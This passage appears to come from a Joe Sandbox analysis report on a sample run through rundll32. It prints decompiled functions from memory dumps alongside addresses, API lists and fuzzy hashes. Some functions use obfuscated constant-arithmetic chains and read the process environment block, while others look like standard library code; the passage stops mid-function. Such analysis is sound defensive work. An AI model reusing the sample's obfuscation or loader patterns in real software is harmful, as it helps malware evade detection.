                                                                                                                          			E00799011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E007A5BFD(_v32, _v28, _v12, E007ADCF7(_v8, __ecx, _v36));
				_t80 =  *0x7b3df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E0079A8B0(_v16, _t74, _v36);
			}

















                                                                                                                          0x00799017
                                                                                                                          0x0079901b
                                                                                                                          0x00799022
                                                                                                                          0x0079902f
                                                                                                                          0x00799035
                                                                                                                          0x00799038
                                                                                                                          0x0079903f
                                                                                                                          0x00799043
                                                                                                                          0x0079904a
                                                                                                                          0x00799051
                                                                                                                          0x00799054
                                                                                                                          0x0079905b
                                                                                                                          0x00799062
                                                                                                                          0x00799066
                                                                                                                          0x0079906d
                                                                                                                          0x00799074
                                                                                                                          0x00799078
                                                                                                                          0x0079907f
                                                                                                                          0x00799086
                                                                                                                          0x0079908a
                                                                                                                          0x00799091
                                                                                                                          0x00799098
                                                                                                                          0x0079909f
                                                                                                                          0x007990a6
                                                                                                                          0x007990aa
                                                                                                                          0x007990b1
                                                                                                                          0x007990bb
                                                                                                                          0x007990c0
                                                                                                                          0x007990c3
                                                                                                                          0x007990ca
                                                                                                                          0x007990d1
                                                                                                                          0x007990d8
                                                                                                                          0x007990df
                                                                                                                          0x007990e6
                                                                                                                          0x007990ed
                                                                                                                          0x007990f0
                                                                                                                          0x00799107
                                                                                                                          0x0079910c
                                                                                                                          0x00799117
                                                                                                                          0x0079912b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dab809eb0228b9e3ee1476b45b4bf6bf9e051718e501e8acbc6afe66837f5214
                                                                                                                          • Instruction ID: d90eefc36516a1db2c397776587298c4a328bba2bffa31d27c0319895e6239cf
                                                                                                                          • Opcode Fuzzy Hash: dab809eb0228b9e3ee1476b45b4bf6bf9e051718e501e8acbc6afe66837f5214
                                                                                                                          • Instruction Fuzzy Hash: 4931E171D0121DEBCF48DFA5D94A4EEBBB1FF84318F208198D421B6250D7B90A59DF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00797FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00797FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E00791E22(_v28, _v24, _t73, E00791DB9(_t67), _v20, _v16);
			}














                                                                                                                          0x00797ff8
                                                                                                                          0x00797ffc
                                                                                                                          0x00798003
                                                                                                                          0x0079800a
                                                                                                                          0x00798011
                                                                                                                          0x00798018
                                                                                                                          0x0079801c
                                                                                                                          0x00798023
                                                                                                                          0x0079802a
                                                                                                                          0x00798031
                                                                                                                          0x00798038
                                                                                                                          0x0079803c
                                                                                                                          0x00798043
                                                                                                                          0x0079804a
                                                                                                                          0x00798055
                                                                                                                          0x0079805b
                                                                                                                          0x0079805e
                                                                                                                          0x00798061
                                                                                                                          0x00798065
                                                                                                                          0x0079806c
                                                                                                                          0x00798073
                                                                                                                          0x0079807a
                                                                                                                          0x00798081
                                                                                                                          0x00798088
                                                                                                                          0x0079808f
                                                                                                                          0x00798096
                                                                                                                          0x0079809d
                                                                                                                          0x007980a4
                                                                                                                          0x007980ab
                                                                                                                          0x007980af
                                                                                                                          0x007980b6
                                                                                                                          0x007980e2

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                          • Instruction ID: 77a4aba6872385e8bea765801ca1df79acba3eb2714e9143d94b5d33e2712cad
                                                                                                                          • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                          • Instruction Fuzzy Hash: B421EDB2D0131EEBCB48DFE5D94A4EEFBB0BB10314F208189D512B2264C3B40B998F91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A4087 Relevance: .0, Instructions: 2COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A4087() {

				return  *[fs:0x30];
			}



                                                                                                                          0x007a408d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0x986eb69
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                          0x10014da8
                                                                                                                          0x10014da9
                                                                                                                          0x10014daf
                                                                                                                          0x10014db3
                                                                                                                          0x10014dba
                                                                                                                          0x10014dc0
                                                                                                                          0x10014dc7
                                                                                                                          0x10014dd8
                                                                                                                          0x10014ddf
                                                                                                                          0x10014de2
                                                                                                                          0x10014de5
                                                                                                                          0x10014de8
                                                                                                                          0x10014df6
                                                                                                                          0x10014df9
                                                                                                                          0x10014dfd
                                                                                                                          0x10014ecb
                                                                                                                          0x10014f87
                                                                                                                          0x10014f8b
                                                                                                                          0x10014f9f
                                                                                                                          0x10014fa2
                                                                                                                          0x10014fac
                                                                                                                          0x10014fb2
                                                                                                                          0x10014fca
                                                                                                                          0x10014fd6
                                                                                                                          0x10014fdb
                                                                                                                          0x10014fde
                                                                                                                          0x10014fde
                                                                                                                          0x10014fac
                                                                                                                          0x10014ed1
                                                                                                                          0x10014ee5
                                                                                                                          0x10014ef0
                                                                                                                          0x10014f06
                                                                                                                          0x10014f15
                                                                                                                          0x10014f2d
                                                                                                                          0x10014f32
                                                                                                                          0x10014f38
                                                                                                                          0x10014f44
                                                                                                                          0x10014f47
                                                                                                                          0x10014f59
                                                                                                                          0x10014f65
                                                                                                                          0x10014f6a
                                                                                                                          0x10014f6d
                                                                                                                          0x10014f6d
                                                                                                                          0x10014f38
                                                                                                                          0x10014f77
                                                                                                                          0x10014f77
                                                                                                                          0x10014ef0
                                                                                                                          0x10014e03
                                                                                                                          0x10014e0b
                                                                                                                          0x10014e0e
                                                                                                                          0x10014e11
                                                                                                                          0x10014e23
                                                                                                                          0x10014e2c
                                                                                                                          0x10014e34
                                                                                                                          0x10014e41
                                                                                                                          0x10014e44
                                                                                                                          0x10014e4b
                                                                                                                          0x10014e4f
                                                                                                                          0x10014e53
                                                                                                                          0x10014e56
                                                                                                                          0x10014e59
                                                                                                                          0x10014e66
                                                                                                                          0x10014e72
                                                                                                                          0x10014e77
                                                                                                                          0x10014e7a
                                                                                                                          0x10014e7a
                                                                                                                          0x10014e81
                                                                                                                          0x10014e81
                                                                                                                          0x10014e86
                                                                                                                          0x10014e89
                                                                                                                          0x10014ea0
                                                                                                                          0x10014ea7
                                                                                                                          0x10014eb6
                                                                                                                          0x10014fec
                                                                                                                          0x10014ff3
                                                                                                                          0x10015003
                                                                                                                          0x10015006
                                                                                                                          0x10015009
                                                                                                                          0x10015010
                                                                                                                          0x10015013
                                                                                                                          0x1001501a
                                                                                                                          0x10015026
                                                                                                                          0x10015030
                                                                                                                          0x10015035
                                                                                                                          0x10015035
                                                                                                                          0x1001503a
                                                                                                                          0x1001503f
                                                                                                                          0x1001505c
                                                                                                                          0x1001505c
                                                                                                                          0x10015063
                                                                                                                          0x10015068
                                                                                                                          0x00000000
                                                                                                                          0x10015041
                                                                                                                          0x10015041
                                                                                                                          0x10015048
                                                                                                                          0x10015050
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10015052
                                                                                                                          0x10015056
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10015058
                                                                                                                          0x1001505a
                                                                                                                          0x00000000
                                                                                                                          0x1001505a
                                                                                                                          0x10014ebc
                                                                                                                          0x10014ebc
                                                                                                                          0x1001506a
                                                                                                                          0x1001506d
                                                                                                                          0x10015075
                                                                                                                          0x10015076
                                                                                                                          0x10015077
                                                                                                                          0x1001508c
                                                                                                                          0x1001508c

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                          • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                          • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                          • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                          • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                          • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                          • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                          • _memset.LIBCMT ref: 10014FF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                          • API String ID: 434808117-483790700
                                                                                                                          • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                          • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                          • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                          • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                          0x1002e136
                                                                                                                          0x1002e13f
                                                                                                                          0x1002e148
                                                                                                                          0x1002e152
                                                                                                                          0x1002e15c
                                                                                                                          0x1002e166
                                                                                                                          0x1002e170
                                                                                                                          0x1002e17a
                                                                                                                          0x1002e184
                                                                                                                          0x1002e18e
                                                                                                                          0x1002e198
                                                                                                                          0x1002e1a2
                                                                                                                          0x1002e1a7
                                                                                                                          0x1002e1ae

                                                                                                                          APIs
                                                                                                                          • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                          • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                          • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                          • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                          • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                          • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                          • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                          • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                          • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                          • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                          • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                          • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardFormatRegister
                                                                                                                          • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                          • API String ID: 1228543026-2889995556
                                                                                                                          • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                          • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                          • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                          • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
